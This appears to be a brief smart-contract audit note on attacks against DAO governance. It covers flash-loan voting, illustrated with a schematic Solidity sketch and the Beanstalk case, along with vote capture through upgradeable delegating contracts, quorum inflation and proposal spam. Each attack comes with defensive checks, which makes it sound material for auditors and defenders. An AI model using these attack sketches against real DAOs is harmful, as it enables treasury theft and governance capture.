contracts-governance-attack

DAOs that grant voting power = current token balance (not snapshot of past balance) are vulnerable: `solidity // Attack: borrow governance token, vote, return loan, all in one tx function attack() external { // 1. Flash-borrow gov tokens IFlashLoan(aave).flashLoan(address(this), govToken, 1_000_000e18, ""); } function executeOperation(...) external { // 2. Vote on the malicious proposal governor.castVote(proposalId, 1); // 1 = for // 3. Repay loan + premium (automatic by flash-loan callback) } ` This is what happened to Beanstalk (April 2022, $182M loss) — attacker flash-borrowed Beanstalk gov tokens, voted to drain the treasury, repaid the loan. Same block. Defense check: Does getVotes(address, blockNumber) reference a past snapshot? If yes (Compound's GovernorBravo pattern, OZ Governor with ERC20Votes + getPastVotes), flash-loan vote doesn't work.

ERC20Votes lets users delegate. If a contract holds gov tokens and delegates to itself, controlling that contract = controlling the votes. `solidity // If the target DAO has a contract holding tokens that delegates to itself, // and that contract is upgradeable/has an admin function: upgradeableContract.upgradeAndCall(newImpl, abi.encodeWithSelector(redelegate.selector, attacker)); // Now attacker controls those votes. `

If quorum = % of total supply (not % of currently-active voters), an attacker can mint or stake extra tokens to push quorum out of reach: `solidity // Some DAOs base quorum on totalSupply() // Attacker mints a bunch of tokens to themselves (via legit minting if they're holder) // Quorum requirement now too high for real voters to meet → all proposals fail `

GovernorBravo has a proposalThreshold. If low, attacker spams proposals to: • Burn proposers' gas • Confuse the UI • Push real proposals out of the active window